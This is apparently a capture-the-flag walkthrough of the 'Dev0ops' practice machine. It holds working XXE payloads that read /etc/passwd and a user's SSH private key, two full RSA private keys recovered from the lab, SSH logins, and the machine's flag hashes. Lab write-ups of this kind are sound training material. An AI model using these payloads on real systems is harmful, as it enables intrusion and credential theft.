[HTB Notes] Dev0ops

1. Check open ports
nmap --min-rate 1000 -p- -v 10.10.10.91
# 22/tcp   open  ssh
# 5000/tcp open  upnp
#
nmap -oN dev0ops.nmap -p22,5000 -sC -sV -v 10.10.10.91
# 22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
# | ssh-hostkey:
# |   2048 42:90:e3:35:31:8d:8b:86:17:2a:fb:38:90:da:c4:95 (RSA)
# |   256 b7:b6:dc:c4:4c:87:9b:75:2a:00:89:83:ed:b2:80:31 (ECDSA)
# |_  256 d5:2f:19:53:b2:8e:3a:4b:b3:dd:3c:1f:c0:37:0d:00 (ED25519)
# 5000/tcp open  http    Gunicorn 19.7.1<span id="mce_SELREST_start" style="overflow:hidden;line-height:0;"></span>
# | http-methods:
# |_  Supported Methods: HEAD OPTIONS GET
# |_http-server-header: gunicorn/19.7.1
# |_http-title: Site doesn't have a title (text/html; charset=utf-8).
# Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

2. Explore http servince on port 5000
[x] Run gobuster
gobuster -u http://10.10.10.91:5000 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
# /feed (Status: 200)
# /upload (Status: 200)
[x] Successfully upload a working XML file
# something.xml
  <Something>
       <Author> someone 
       <Subject> something 
       <Content> something     
  </Something>
# PROCESSED BLOGPOST: Author: someone Subject: something Content: something
# URL for later reference: /uploads/something.xml
# File path: /home/roosa/deploy/src
[x] Check for XXE (XML External Entities) vulnerability
# xxe_test.xml
  <!DOCTYPE foo [
      <!ELEMENT foo ANY >
      <!ENTITY xxe SYSTEM "file:///etc/passwd" >   
  ]>
  <Something>
      <Author> someone 
      <Subject> something 
      <Content> &xxe;     
  </Something>
# git:x:1001:1001:git,,,:/home/git:/bin/bash 
# roosa:x:1002:1002:,,,:/home/roosa:/bin/bash
[x] Attempt LFI (Local File Inclusion)
# xxe_lfi.xml
  <!DOCTYPE foo [
      <!ELEMENT foo ANY >
      <!ENTITY xxe SYSTEM "file:///home/roosa/.ssh/id_rsa" >   
  ]>
  <Something>
      <Author> someone 
      <Subject> something 
      <Content> &xxe;     
  </Something>
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAuMMt4qh/ib86xJBLmzePl6/5ZRNJkUj/Xuv1+d6nccTffb/7
9sIXha2h4a4fp18F53jdx3PqEO7HAXlszAlBvGdg63i+LxWmu8p5BrTmEPl+cQ4J
R/R+exNggHuqsp8rrcHq96lbXtORy8SOliUjfspPsWfY7JbktKyaQK0JunR25jVk
v5YhGVeyaTNmSNPTlpZCVGVAp1RotWdc/0ex7qznq45wLb2tZFGE0xmYTeXgoaX4
9QIQQnoi6DP3+7ErQSd6QGTq5mCvszpnTUsmwFj5JRdhjGszt0zBGllsVn99O90K
m3pN8SN1yWCTal6FLUiuxXg99YSV0tEl0rfSUwIDAQABAoIBAB6rj69jZyB3lQrS
JSrT80sr1At6QykR5ApewwtCcatKEgtu1iWlHIB9TTUIUYrYFEPTZYVZcY50BKbz
ACNyme3rf0Q3W+K3BmF//80kNFi3Ac1EljfSlzhZBBjv7msOTxLd8OJBw8AfAMHB
lCXKbnT6onYBlhnYBokTadu4nbfMm0ddJo5y32NaskFTAdAG882WkK5V5iszsE/3
koarlmzP1M0KPyaVrID3vgAvuJo3P6ynOoXlmn/oncZZdtwmhEjC23XALItW+lh7
e7ZKcMoH4J2W8OsbRXVF9YLSZz/AgHFI5XWp7V0Fyh2hp7UMe4dY0e1WKQn0wRKe
8oa9wQkCgYEA2tpna+vm3yIwu4ee12x2GhU7lsw58dcXXfn3pGLW7vQr5XcSVoqJ
Lk6u5T6VpcQTBCuM9+voiWDX0FUWE97obj8TYwL2vu2wk3ZJn00U83YQ4p9+tno6
NipeFs5ggIBQDU1k1nrBY10TpuyDgZL+2vxpfz1SdaHgHFgZDWjaEtUCgYEA2B93
hNNeXCaXAeS6NJHAxeTKOhapqRoJbNHjZAhsmCRENk6UhXyYCGxX40g7i7T15vt0
ESzdXu+uAG0/s3VNEdU5VggLu3RzpD1ePt03eBvimsgnciWlw6xuZlG3UEQJW8sk
A3+XsGjUpXv9TMt8XBf3muESRBmeVQUnp7RiVIcCgYBo9BZm7hGg7l+af1aQjuYw
agBSuAwNy43cNpUpU3Ep1RT8DVdRA0z4VSmQrKvNfDN2a4BGIO86eqPkt/lHfD3R
KRSeBfzY4VotzatO5wNmIjfExqJY1lL2SOkoXL5wwZgiWPxD00jM4wUapxAF4r2v
vR7Gs1zJJuE4FpOlF6SFJQKBgHbHBHa5e9iFVOSzgiq2GA4qqYG3RtMq/hcSWzh0
8MnE1MBL+5BJY3ztnnfJEQC9GZAyjh2KXLd6XlTZtfK4+vxcBUDk9x206IFRQOSn
y351RNrwOc2gJzQdJieRrX+thL8wK8DIdON9GbFBLXrxMo2ilnBGVjWbJstvI9Yl
aw0tAoGAGkndihmC5PayKdR1PYhdlVIsfEaDIgemK3/XxvnaUUcuWi2RhX3AlowG
xgQt1LOdApYoosALYta1JPen+65V02Fy5NgtoijLzvmNSz+rpRHGK6E8u3ihmmaq
82W3d4vCUPkKnrgG8F7s3GL6cqWcbZBd0j9u88fUWfPxfRaQU3s=
-----END RSA PRIVATE KEY-----
[x] Save private key as ssh_roosa.key
chmod 400 ssh_roosa.key

3. Generate shell as user (roosa)
ssh -i ssh_roosa.key -l roosa 10.10.10.91
# roosa@gitter:~$
[x] While inside shell:
find / -name user.txt 2> /dev/null
# /home/roosa/user.txt
#
cat /home/roosa/user.txt
# c5808e1643e801d40f09ed87cdecc67b

4. Attempt Privilege Escalation (roosa -> root)
[x] Navigate to ~/work
cd ~/work
ls -la
# drwxrwx--- 5 roosa roosa 4096 Oct 14 12:06 blogfeed
#
ls -la blogfeed
# drwxrwx--- 8 roosa roosa 4096 Mar 26  2018 .git
[x] Explore .git directory
cd ~/work/blogfeed/.git
cat logs/HEAD
# [-] d387abf63e05c9628a59195cec9311751bdb283f 
# [*] commit: add key for feed integration from tnerprise backend
#
# [-] 33e87c312c08735a02fa9c796021a4a3023129ad
# [*] commit: reverted accidental commit with proper key
#
git cat-file -p d387abf63e05c9628a59195cec9311751bdb283f
# [-] tree -> f34d3c1444928c71b04a230ffdca810ac3846eb0
#
git cat-file -p f34d3c1444928c71b04a230ffdca810ac3846eb0
# [-] tree -> e14586d1a0f07cd37e1793a07b63339b9fc5f95e
#
git cat-file -p e14586d1a0f07cd37e1793a07b63339b9fc5f95e
# [-] tree -> 30aad4b269eb0012f1b5f4f13919bc68deac70a2
#
git cat-file -p 30aad4b269eb0012f1b5f4f13919bc68deac70a2
# [-] blob -> 44c981f1e321f48a127adb6a40b0e05545cc32a8
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEArDvzJ0k7T856dw2pnIrStl0GwoU/WFI+OPQcpOVj9DdSIEde
8PDgpt/tBpY7a/xt3sP5rD7JEuvnpWRLteqKZ8hlCvt+4oP7DqWXoo/hfaUUyU5i
vr+5Ui0nD+YBKyYuiN+4CB8jSQvwOG+LlA3IGAzVf56J0WP9FILH/NwYW2iovTRK
nz1y2vdO3ug94XX8y0bbMR9Mtpj292wNrxmUSQ5glioqrSrwFfevWt/rEgIVmrb+
CCjeERnxMwaZNFP0SYoiC5HweyXD6ZLgFO4uOVuImILGJyyQJ8u5BI2mc/SHSE0c
F9DmYwbVqRcurk3yAS+jEbXgObupXkDHgIoMCwIDAQABAoIBAFaUuHIKVT+UK2oH
uzjPbIdyEkDc3PAYP+E/jdqy2eFdofJKDocOf9BDhxKlmO968PxoBe25jjjt0AAL
gCfN5I+xZGH19V4HPMCrK6PzskYII3/i4K7FEHMn8ZgDZpj7U69Iz2l9xa4lyzeD
k2X0256DbRv/ZYaWPhX+fGw3dCMWkRs6MoBNVS4wAMmOCiFl3hzHlgIemLMm6QSy
NnTtLPXwkS84KMfZGbnolAiZbHAqhe5cRfV2CVw2U8GaIS3fqV3ioD0qqQjIIPNM
HSRik2J/7Y7OuBRQN+auzFKV7QeLFeROJsLhLaPhstY5QQReQr9oIuTAs9c+oCLa
2fXe3kkCgYEA367aoOTisun9UJ7ObgNZTDPeaXajhWrZbxlSsOeOBp5CK/oLc0RB
GLEKU6HtUuKFvlXdJ22S4/rQb0RiDcU/wOiDzmlCTQJrnLgqzBwNXp+MH6Av9WHG
jwrjv/loHYF0vXUHHRVJmcXzsftZk2aJ29TXud5UMqHovyieb3mZ0pcCgYEAxR41
IMq2dif3laGnQuYrjQVNFfvwDt1JD1mKNG8OppwTgcPbFO+R3+MqL7lvAhHjWKMw
+XjmkQEZbnmwf1fKuIHW9uD9KxxHqgucNv9ySuMtVPp/QYtjn/ltojR16JNTKqiW
7vSqlsZnT9jR2syvuhhVz4Ei9yA/VYZG2uiCpK0CgYA/UOhz+LYu/MsGoh0+yNXj
Gx+O7NU2s9sedqWQi8sJFo0Wk63gD+b5TUvmBoT+HD7NdNKoEX0t6VZM2KeEzFvS
iD6fE+5/i/rYHs2Gfz5NlY39ecN5ixbAcM2tDrUo/PcFlfXQhrERxRXJQKPHdJP7
VRFHfKaKuof+bEoEtgATuwKBgC3Ce3bnWEBJuvIjmt6u7EFKj8CgwfPRbxp/INRX
S8Flzil7vCo6C1U8ORjnJVwHpw12pPHlHTFgXfUFjvGhAdCfY7XgOSV+5SwWkec6
md/EqUtm84/VugTzNH5JS234dYAbrx498jQaTvV8UgtHJSxAZftL8UAJXmqOR3ie
LWXpAoGADMbq4aFzQuUPldxr3thx0KRz9LJUJfrpADAUbxo8zVvbwt4gM2vsXwcz
oAvexd1JRMkbC7YOgrzZ9iOxHP+mg/LLENmHimcyKCqaY3XzqXqk9lOhA3ymOcLw
LS4O7JPRqVmgZzUUnDiAVuUHWuHGGXpWpz9EGau6dIbQaUUSOEE=
-----END RSA PRIVATE KEY-----
[1] 14 22e5a04d1b52a44e6dc81023420347e257ee5f		Initial commit
     
	TREE 	: 28 663660daa527d277c0a82774fbfdabb0abad3f
	blob 	: fe 0a1d021a0dacc771ac785c399071876e5a6ae1 [README.md]

[2] d3 87abf63e05c9628a59195cec9311751bdb283f		add key for feed integration from tnerprise backend
     
	TREE	: f3 4d3c1444928c71b04a230ffdca810ac3846eb0
	blob 	: fe 0a1d021a0dacc771ac785c399071876e5a6ae1 [README.md]
	tree 	: e1 4586d1a0f07cd37e1793a07b63339b9fc5f95e [resources]
	--tree 	: 30 aad4b269eb0012f1b5f4f13919bc68deac70a2 [integration]
	----blob: 44 c981f1e321f48a127adb6a40b0e05545cc32a8 [authcredentials.key]

[3] 33 e87c312c08735a02fa9c796021a4a3023129ad		reverted accidental commit with proper key
     
	TREE	: c2 5f135513a4db4e2f87418e7bf1107cd7c25371
	blob 	: fe 0a1d021a0dacc771ac785c399071876e5a6ae1 [README.md]
	tree 	: 32 93fdb4a599c0d05e0b13af035a7c8024376e80 [resources]
	--tree 	: f9 00a57d3ff4ea618feca15263b83be8dc3d584d [integration]
	----blob: f4 bde49fc24d1fd47a05c4b0d50b70366f4e9c56 [authcredentials.key]

[4] df ebfdfd9146c98432d19e3f7d83cc5f3adbfe94		Gunicorn startup script
     
	TREE	: 51 ecfea82c6979665cde44c3d3635839d792e3fd
	blob 	: fe 0a1d021a0dacc771ac785c399071876e5a6ae1 [README.md]
	tree 	: 32 93fdb4a599c0d05e0b13af035a7c8024376e80 [resources]
	blob 	: 07 79936f6497aa995421a55cc2ba99b8e8fb0097 [run-gunicorn.sh]

[5] ca 3e768f2434511e75bd5137593895bd38e1b1c2		Blogfeed app, initial version.

	TREE	: 67 4d6cec88527a58636009b4cc2af226b656460a
	blob 	: fe 0a1d021a0dacc771ac785c399071876e5a6ae1 [README.md]
	tree 	: 32 93fdb4a599c0d05e0b13af035a7c8024376e80 [resources]
	blob 	: 07 79936f6497aa995421a55cc2ba99b8e8fb0097 [run-gunicorn.sh]
	tree 	: 9c 8c24eaf6ad15864c76278009d35da1a139d322 [src]
	--blob 	: 81 9aa9ac0cb6bc12029206bdfbb7bca97bc69d9b [feed.py]
	--blob 	: 12 43ddacbe89c344e1074c094ce34eae7de1a463 [index.html]
	--blob 	: 63 0385e58a1be801492795aba3057bc86495d590 [upload.html]

[6] ce c54d8cb6117fd7f164db142f0348a74d3e9a70		Debug support added to make development more agile.
     
	TREE 	: 12 65450ddc99e8d15b724df9c14fcf94fab3e4f5
	blob 	: fe 0a1d021a0dacc771ac785c399071876e5a6ae1 [README.md]
	tree 	: 32 93fdb4a599c0d05e0b13af035a7c8024376e80 [resources]
	blob 	: 07 79936f6497aa995421a55cc2ba99b8e8fb0097 [run-gunicorn.sh]
	tree 	: 15 661d8b2cd141c488c488a85d11f62143cb12b2 [src]
	--blob	: 09 2df11679f54b8a63c67ee809098137a8862cdc [feed.py]
	--blob 	: 12 43ddacbe89c344e1074c094ce34eae7de1a463 [index.html]
	--blob 	: 63 0385e58a1be801492795aba3057bc86495d590 [upload.html]

[7] 26 ae6c8668995b2f09bf9e2809c36b156207bfa8		Set PIN to make debugging faster as it will no longer change every time the application code 	  								is changed. Remember to remove before production use.
	TREE	: c9 6ca250c890f1e62cc7c38d6700ee7fab8d66dc
	blob 	: fe 0a1d021a0dacc771ac785c399071876e5a6ae1 [README.md]
	tree 	: 32 93fdb4a599c0d05e0b13af035a7c8024376e80 [resources]
	blob 	: 07 f8fb3d48674b59186868e145b45be7c6bbafcf [run-gunicorn.sh]
	tree 	: 34 9920466cd0d9651ddb9f04d6d2ff554403a60f [src]
	--blob 	: 6d e2b19ed2bbba93cdabaf3b8bedd98ddabfd993 [feed.py]
	--blob 	: 12 43ddacbe89c344e1074c094ce34eae7de1a463 [index.html]
	--blob 	: 63 0385e58a1be801492795aba3057bc86495d590 [upload.html]

[8] 7f f507d029021b0915235ff91e6a74ba33009c6d		Use Base64 for pickle feed loading

	TREE	: 17 5743e03c7472fe9ede3d37e6eab7b35a88fbd8
	blob 	: fe 0a1d021a0dacc771ac785c399071876e5a6ae1 [README.md]
	tree 	: 32 93fdb4a599c0d05e0b13af035a7c8024376e80 [resources]
	blob 	: 07 f8fb3d48674b59186868e145b45be7c6bbafcf [run-gunicorn.sh]
	tree 	: 70 27688693a2b0ca9fb1b80dd00ec193c5da0a29 [src]
	--blob 	: 81 e7ce0773f92d2dc343de62d259429d39b3674f [feed.py]
	--blob	: b5 244f5eba4bee25f44039fc1afb41d1a5d6aaf3 [index.html]
	--blob	: 63 0385e58a1be801492795aba3057bc86495d590 [upload.html]

[9] d3 87abf63e05c9628a59195cec9311751bdb283f (8->2)
     (tree == f3 4d3c1444928c71b04a230ffdca810ac3846eb0)
[x] Extract private key and save as ssh_root.key
chmod 400 ssh_root.key
[x] Generate shell as root
ssh -i ssh_root.key 10.10.10.91
# root@gitter:~#
[x] While inside shell:
find / -name "root.txt"
# /root/root.txt
#
cat /root/root.txt
# d4fe1e7f7187407eebdd3209cb1ac7b3